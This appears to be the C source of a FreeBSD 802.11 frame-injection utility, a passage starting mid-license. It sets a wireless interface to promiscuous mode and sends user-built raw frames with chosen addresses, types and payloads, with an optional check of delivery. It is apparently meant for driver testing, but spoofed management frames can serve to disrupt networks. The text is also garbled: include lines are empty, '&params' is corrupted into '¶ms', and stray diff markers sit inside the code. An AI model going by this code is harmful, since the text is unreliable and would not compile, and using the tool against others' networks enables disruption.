INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $FreeBSD$ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include void setup_if(char *dev, int chan) { int s; struct ifreq ifr; unsigned int flags; struct ifmediareq ifmr; int *mwords; struct ieee80211req ireq; if ((s = socket(PF_INET, SOCK_DGRAM, 0)) == -1) err(1, "socket()"); /* chan */ memset(&ireq, 0, sizeof(ireq)); snprintf(ireq.i_name, sizeof(ireq.i_name), "%s", dev); ireq.i_type = IEEE80211_IOC_CHANNEL; ireq.i_val = chan; if (ioctl(s, SIOCS80211, &ireq) == -1) err(1, "ioctl(SIOCS80211)"); /* UP & PROMISC */ memset(&ifr, 0, sizeof(ifr)); snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", dev); if (ioctl(s, SIOCGIFFLAGS, &ifr) == -1) err(1, "ioctl(SIOCGIFFLAGS)"); flags = (ifr.ifr_flags & 0xffff) | (ifr.ifr_flagshigh << 16); flags |= IFF_UP | IFF_PPROMISC; ifr.ifr_flags = flags & 0xffff; ifr.ifr_flagshigh = flags >> 16; if (ioctl(s, SIOCSIFFLAGS, &ifr) == -1) err(1, "ioctl(SIOCSIFFLAGS)"); close(s); } int open_bpf(char *dev) { char buf[64]; int i; int fd; struct ifreq ifr; unsigned int dlt = DLT_IEEE802_11_RADIO; for (i = 0; i < 64; i++) { sprintf(buf, "/dev/bpf%d", i); fd = open(buf, O_RDWR); if (fd != -1) break; else if (errno != EBUSY) err(1, "open()"); } if (fd == -1) { printf("Can't find bpf\n"); exit(1); } memset(&ifr, 0, sizeof(ifr)); snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", dev); if (ioctl(fd, BIOCSETIF, &ifr) == -1) err(1, "ioctl(BIOCSETIF)"); if (ioctl(fd, BIOCSDLT, &dlt) == -1) err(1, "ioctl(BIOCSDLT)"); i = 1; if (ioctl(fd, BIOCIMMEDIATE, &i) == -1) err(1, "ioctl(BIOCIMMEDIATE)"); return fd; } void inject(int fd, void *buf, int buflen, struct ieee80211_bpf_params *p) { struct iovec iov[2]; int totlen; int rc; iov[0].iov_base = p; iov[0].iov_len = p->ibp_len; iov[1].iov_base = buf; iov[1].iov_len = buflen; totlen = iov[0].iov_len + iov[1].iov_len; rc = writev(fd, iov, sizeof(iov)/sizeof(struct iovec)); if (rc == -1) err(1, "writev()"); if (rc != totlen) { printf("Wrote only %d/%d\n", rc, totlen); exit(1); } } void usage(char *progname) { printf("Usage: %s \n" "Physical:\n" "\t-i\t\n" "\t-c\t\n" "\t-N\tno ack\n" "\t-V\t [verify via iface whether packet was mangled]\n" "\t-W\tWME AC\n" "\t-X\ttransmit rate (Mbps)\n" "\t-P\ttransmit power (device units)\n" "802.11:\n" "\t-h\tthis lame message\n" "\t-v\t\n" "\t-t\t\n" "\t-s\t\n" "\t-T\tto ds\n" "\t-F\tfrom ds\n" "\t-m\tmore frags\n" "\t-r\tretry\n" "\t-p\tpower\n" "\t-d\tmore data\n" "\t-w\twep\n" "\t-o\torder\n" "\t-u\t\n" "\t-1\t\n" "\t-2\t\n" "\t-3\t\n" "\t-n\t\n" "\t-f\t\n" "\t-4\t\n" "\t-b\t\n" "\t-l\t\n" "Management:\n" "\t-e\t\n" "\t-S\t\n" "\t-a\t\n" "\t-A\t\n" "\t-C\t\n" "\t-R\tstandard rates\n" , progname); exit(1); } int str2type(const char *type) { #define equal(a,b) (strcasecmp(a,b) == 0) if (equal(type, "mgt")) return IEEE80211_FC0_TYPE_MGT >> IEEE80211_FC0_TYPE_SHIFT; else if (equal(type, "ctl")) return IEEE80211_FC0_TYPE_CTL >> IEEE80211_FC0_TYPE_SHIFT; else if (equal(type, "data")) return IEEE80211_FC0_TYPE_DATA >> IEEE80211_FC0_TYPE_SHIFT; return atoi(type) & 3; #undef equal } int str2subtype(const char *subtype) { #define equal(a,b) (strcasecmp(a,b) == 0) if (equal(subtype, "preq") || equal(subtype, "probereq")) return IEEE80211_FC0_SUBTYPE_PROBE_REQ >> IEEE80211_FC0_SUBTYPE_SHIFT; else if (equal(subtype, "auth")) return IEEE80211_FC0_SUBTYPE_AUTH >> IEEE80211_FC0_SUBTYPE_SHIFT; else if (equal(subtype, "areq") || equal(subtype, "assocreq")) return IEEE80211_FC0_SUBTYPE_ASSOC_REQ >> IEEE80211_FC0_SUBTYPE_SHIFT; else if (equal(subtype, "data")) return IEEE80211_FC0_SUBTYPE_DATA >> IEEE80211_FC0_SUBTYPE_SHIFT; return atoi(subtype) & 0xf; #undef equal } void str2mac(unsigned char *mac, char *str) { unsigned int macf[6]; int i; if (sscanf(str, "%x:%x:%x:%x:%x:%x", &macf[0], &macf[1], &macf[2], &macf[3], &macf[4], &macf[5]) != 6) { printf("can't parse mac %s\n", str); exit(1); } for (i = 0; i < 6; i++) *mac++ = (unsigned char) macf[i]; } int str2wmeac(const char *ac) { #define equal(a,b) (strcasecmp(a,b) == 0) if (equal(ac, "ac_be") || equal(ac, "be")) return WME_AC_BE; if (equal(ac, "ac_bk") || equal(ac, "bk")) return WME_AC_BK; if (equal(ac, "ac_vi") || equal(ac, "vi")) return WME_AC_VI; if (equal(ac, "ac_vo") || equal(ac, "vo")) return WME_AC_VO; errx(1, "unknown wme access class %s", ac); #undef equal } int str2rate(const char *rate) { switch (atoi(rate)) { case 54: return 54*2; case 48: return 48*2; case 36: return 36*2; case 24: return 24*2; case 18: return 18*2; case 12: return 12*2; case 9: return 9*2; case 6: return 6*2; case 11: return 11*2; case 5: return 11; case 2: return 2*2; case 1: return 1*2; } errx(1, "unknown transmit rate %s", rate); } const char *rate2str(int rate) { static char buf[30]; if (rate == 11) return "5.5"; snprintf(buf, sizeof(buf), "%u", rate/2); return buf; } int load_payload(char *fname, void *buf, int len) { int fd; int rc; if ((fd = open(fname, O_RDONLY)) == -1) err(1, "open()"); if ((rc = read(fd, buf, len)) == -1) err(1, "read()"); close(fd); printf("Read %d bytes from %s\n", rc, fname); return rc; } int header_len(struct ieee80211_frame *wh) { int len = sizeof(*wh); switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) { case IEEE80211_FC0_TYPE_MGT: switch (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) { case IEEE80211_FC0_SUBTYPE_ASSOC_REQ: len += 2 + 2; /* capa & listen */ break; case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: len += 2 + 2 + 2; /* capa & status & assoc */ break; case IEEE80211_FC0_SUBTYPE_REASSOC_REQ: len += 2 + 2 + 6; /* capa & listen & AP */ break; case IEEE80211_FC0_SUBTYPE_REASSOC_RESP: len += 2 + 2 + 2; /* capa & status & assoc */ break; case IEEE80211_FC0_SUBTYPE_PROBE_REQ: case IEEE80211_FC0_SUBTYPE_ATIM: break; case IEEE80211_FC0_SUBTYPE_PROBE_RESP: case IEEE80211_FC0_SUBTYPE_BEACON: len += 8 + 2 + 2; /* time & bint & capa */ break; case IEEE80211_FC0_SUBTYPE_DISASSOC: len += 2; /* reason */ break; case IEEE80211_FC0_SUBTYPE_AUTH: len += 2 + 2 + 2; /* algo & seq & status */ break; case IEEE80211_FC0_SUBTYPE_DEAUTH: len += 2; /* reason */ break; default: errx(1, "Unknown MGT subtype 0x%x", wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK); } break; case IEEE80211_FC0_TYPE_CTL: switch (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) { case IEEE80211_FC0_SUBTYPE_PS_POLL: len = sizeof(struct ieee80211_frame_pspoll); break; case IEEE80211_FC0_SUBTYPE_RTS: len = sizeof(struct ieee80211_frame_rts); break; case IEEE80211_FC0_SUBTYPE_CTS: len = sizeof(struct ieee80211_frame_cts); break; case IEEE80211_FC0_SUBTYPE_ACK: len = sizeof(struct ieee80211_frame_ack); break; case IEEE80211_FC0_SUBTYPE_CF_END_ACK: case IEEE80211_FC0_SUBTYPE_CF_END: len = sizeof(struct ieee80211_frame_cfend); break; default: errx(1, "Unknown CTL subtype 0x%x", wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK); } break; case IEEE80211_FC0_TYPE_DATA: if (wh->i_fc[1] & IEEE80211_FC1_DIR_DSTODS) len += sizeof(wh->i_addr1); break; default: errx(1, "Unknown type 0x%x", wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK); exit(1); } return len; } int parse_ie(char *str, unsigned char *ie, int len) { int digits = 0; char num[3]; int conv = 0; int ielen; ielen = strlen(str)/2; if (ielen < 1 || (strlen(str) % 2)) { printf("Invalid IE %s\n", str); exit(1); } num[2] = 0; while (ielen) { num[digits++] = *str; str++; if (digits == 2) { unsigned int x; sscanf(num, "%x", &x); if (len <= 0) { printf("No space for IE\n"); exit(1); } *ie++ = (unsigned char) x; len--; ielen--; /* first char */ if (conv == 0) { if (len == 0) { printf("No space for IE\n"); exit(1); } *ie++ = (unsigned char) ielen; len--; conv++; } conv++; digits = 0; } } return conv; } int possible_match(struct ieee80211_frame *sent, int slen, struct ieee80211_frame *got, int glen) { if (slen != glen) return 0; if (memcmp(sent->i_addr1, got->i_addr1, 6) != 0) printf("Addr1 doesn't match\n"); if ((sent->i_fc[0] & IEEE80211_FC0_TYPE_MASK) != (got->i_fc[0] & IEEE80211_FC0_TYPE_MASK)) return 0; if ((sent->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) != (got->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK)) return 0; /* Good enough for CTL frames I guess */ if ((got->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_CTL) return 1; if (memcmp(sent->i_addr2, got->i_addr2, 6) == 0 && memcmp(sent->i_addr3, got->i_addr3, 6) == 0) return 1; return 0; } int do_verify(struct ieee80211_frame *sent, int slen, void *got, int glen) { #define BIT(n) (1<<(n)) struct bpf_hdr *bpfh = got; struct ieee80211_frame *wh; struct ieee80211_radiotap_header *rth; int i; unsigned char *ptr, *ptr2; uint32_t present; uint8_t rflags; /* get the 802.11 header */ glen -= bpfh->bh_hdrlen; assert(glen > 0); if (bpfh->bh_caplen != glen) { abort(); } rth = (struct ieee80211_radiotap_header*) ((char*) bpfh + bpfh->bh_hdrlen); glen -= rth->it_len; assert(glen > 0); wh = (struct ieee80211_frame*) ((char*)rth + rth->it_len); /* check if FCS/CRC is included in packet */ present = le32toh(rth->it_present); if (present & BIT(IEEE80211_RADIOTAP_FLAGS)) { if (present & BIT(IEEE80211_RADIOTAP_TSFT)) rflags = ((const uint8_t *)rth)[8]; else rflags = ((const uint8_t *)rth)[0]; } else rflags = 0; if (rflags & IEEE80211_RADIOTAP_F_FCS) glen -= IEEE80211_CRC_LEN; assert(glen > 0); /* did we receive the packet we sent? */ if (!possible_match(sent, slen, wh, glen)) return 0; /* check if it got mangled */ if (memcmp(sent, wh, slen) == 0) { printf("No mangling---got it perfect\n"); return 1; } /* print differences */ printf("Got mangled:\n"); ptr = (unsigned char*) sent; ptr2 = (unsigned char *) wh; for (i = 0; i < slen; i++, ptr++, ptr2++) { if (*ptr != *ptr2) printf("Position: %d Was: %.2X Got: %.2X\n", i, *ptr, *ptr2); } return -1; #undef BIT } int main(int argc, char *argv[]) { int fd, fd2; char *iface = "wlan0"; char *verify = NULL; int chan = 1; struct { struct ieee80211_frame w; unsigned char buf[2048]; } __packed u; int len = 0; int ch; struct ieee80211_bpf_params params; struct ieee80211_frame *wh = &u.w; unsigned char *body = u.buf; memset(&u, 0, sizeof(u)); memset(¶ms, 0, sizeof(params)); params.ibp_vers = IEEE80211_BPF_VERSION; params.ibp_len = sizeof(struct ieee80211_bpf_params) - 6, params.ibp_rate0 = 2; /* 1 MB/s XXX */ params.ibp_try0 = 1; /* no retransmits */ params.ibp_power = 100; /* nominal max */ params.ibp_pri = WME_AC_VO; /* high priority */ while ((ch = getopt(argc, argv, "hv:t:s:TFmpdwou:1:2:3:4:b:i:c:l:n:f:e:S:a:A:C:NRV:W:X:P:")) != -1) { switch (ch) { case 'i': iface = optarg; break; case 'c': chan = atoi(optarg); break; case 'v': wh->i_fc[0] |= atoi(optarg)& IEEE80211_FC0_VERSION_MASK; break; case 't': wh->i_fc[0] |= str2type(optarg) << IEEE80211_FC0_TYPE_SHIFT; break; case 's': wh->i_fc[0] |= str2subtype(optarg) << IEEE80211_FC0_SUBTYPE_SHIFT; len = header_len(wh); body += len; break; case 'T': wh->i_fc[1] |= IEEE80211_FC1_DIR_TODS; break; case 'F': wh->i_fc[1] |= IEEE80211_FC1_DIR_FROMDS; break; case 'm': wh->i_fc[1] |= IEEE80211_FC1_MORE_FRAG; break; case 'r': wh->i_fc[1] |= IEEE80211_FC1_RETRY; break; case 'p': wh->i_fc[1] |= IEEE80211_FC1_PWR_MGT; break; case 'd': wh->i_fc[1] |= IEEE80211_FC1_MORE_DATA; break; case 'w': - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; break; case 'o': wh->i_fc[1] |= IEEE80211_FC1_ORDER; break; case 'u': *(uint16_t*)wh->i_dur = htole16(atoi(optarg)); break; case '1': str2mac(wh->i_addr1, optarg); break; case '2': str2mac(wh->i_addr2, optarg); break; case '3': str2mac(wh->i_addr3, optarg); break; case '4': str2mac(body, optarg); break; case 'n': *(uint16_t*)wh->i_seq |= htole16((atoi(optarg) & 0xfff) << IEEE80211_SEQ_SEQ_SHIFT); break; case 'f': wh->i_seq[0] |= atoi(optarg) & 0xf; break; case 'b': len += load_payload(optarg, body, u.buf + sizeof(u.buf) - body); break; case 'l': len = atoi(optarg); break; case 'e': do { int ln; ln = parse_ie(optarg, body, u.buf + sizeof(u.buf) - body); len += ln; body += ln; } while(0); break; case 'S': do { int ln; int left = u.buf + sizeof(u.buf) - body; ln = strlen(optarg) & 0xff; if ((ln + 2) > left) { printf("No space for SSID\n"); exit(1); } *body++ = 0; *body++ = ln; memcpy(body, optarg, ln); body += ln; len += ln + 2; } while(0); break; case 'R': do { unsigned char rates[] = "\x1\x4\x82\x84\xb\x16"; int left = u.buf + sizeof(u.buf) - body; if ((sizeof(rates) - 1) > left) { printf("No space for rates\n"); exit(1); } memcpy(body, rates, sizeof(rates) - 1); body += sizeof(rates) - 1; len += sizeof(rates) - 1; } while(0); break; case 'a': do { uint16_t *x = (uint16_t*) (wh+1); *x = htole16(atoi(optarg)); } while(0); break; case 'A': do { uint16_t *x = (uint16_t*) (wh+1); x += 1; *x = htole16(atoi(optarg)); } while(0); break; case 'C': do { uint16_t *x = (uint16_t*) (wh+1); if ((wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) == IEEE80211_FC0_SUBTYPE_AUTH) x += 1; x += 1; *x = htole16(atoi(optarg)); } while(0); break; case 'N': params.ibp_flags |= IEEE80211_BPF_NOACK; break; case 'V': verify = optarg; break; case 'W': params.ibp_pri = str2wmeac(optarg); break; case 'X': params.ibp_rate0 = str2rate(optarg); break; case 'P': params.ibp_power = atoi(optarg); break; case 'h': default: usage(argv[0]); break; } } if (!len) { usage(argv[0]); exit(1); } printf("Using interface %s on chan %d, transmit at %s Mbp/s\n", iface, chan, rate2str(params.ibp_rate0)); setup_if(iface, chan); fd = open_bpf(iface); printf("Dose: %db\n", len); if (verify) { setup_if(verify, chan); fd2 = open_bpf(verify); } inject(fd, wh, len, ¶ms); close(fd); if (verify) { char buf2[4096]; int rc; int max = 10; int timeout = 2; fd_set fds; struct timeval tv; time_t start; printf("Verifying via %s\n", verify); start = time(NULL); while (max--) { FD_ZERO(&fds); FD_SET(fd2, &fds); tv.tv_usec = 0; tv.tv_sec = time(NULL) - start; if (tv.tv_sec >= timeout) { timeout = 0; break; } tv.tv_sec = timeout - tv.tv_sec; if (select(fd2+1, &fds, NULL, NULL, &tv) == -1) err(1, "select()"); if (!FD_ISSET(fd2, &fds)) continue; if ((rc = read(fd2, buf2, sizeof(buf2))) == -1) err(1, "read()"); if (do_verify(wh, len, buf2, rc)) { max = 666; break; } } if (max != 666 || !timeout) printf("No luck\n"); close(fd2); } exit(0); }